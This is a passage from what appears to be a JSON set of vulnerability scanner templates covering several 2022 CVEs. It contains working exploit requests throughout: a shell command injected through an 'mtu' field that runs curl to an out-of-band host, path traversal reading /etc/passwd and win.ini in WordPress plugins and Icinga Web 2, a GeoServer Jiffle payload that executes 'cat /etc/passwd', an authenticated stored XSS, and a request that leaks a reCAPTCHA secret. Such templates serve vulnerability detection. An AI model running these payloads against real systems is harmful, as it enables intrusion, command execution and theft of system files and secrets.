application/json\n\n{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{interactsh-url}};\",\"data\":\"hi\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1391","info":{"name":"WordPress Cab fare calculator < 1.0.4 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4140","info":{"name":"WordPress Welcart e-Commerce <2.8.5 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd","{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24716","info":{"name":"Icinga Web 2 - Arbitrary File Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd","{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n\n \n ras:Jiffle\n \n \n coverage\n \n \n \n \n \n script\n \n dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**\n \n \n \n outputType\n \n DOUBLE\n \n \n \n \n \n result\n \n \n \n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43170","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=info_block&is_active=1§ions_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1442","info":{"name":"WordPress Metform <=2.1.3 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-json/metform/v1/forms/templates/0 HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/metform/v1/forms/get/{{id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["mf_recaptcha_secret_key","admin_email_from"],"condition":"and"},{"type":"word","part":"header_2","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["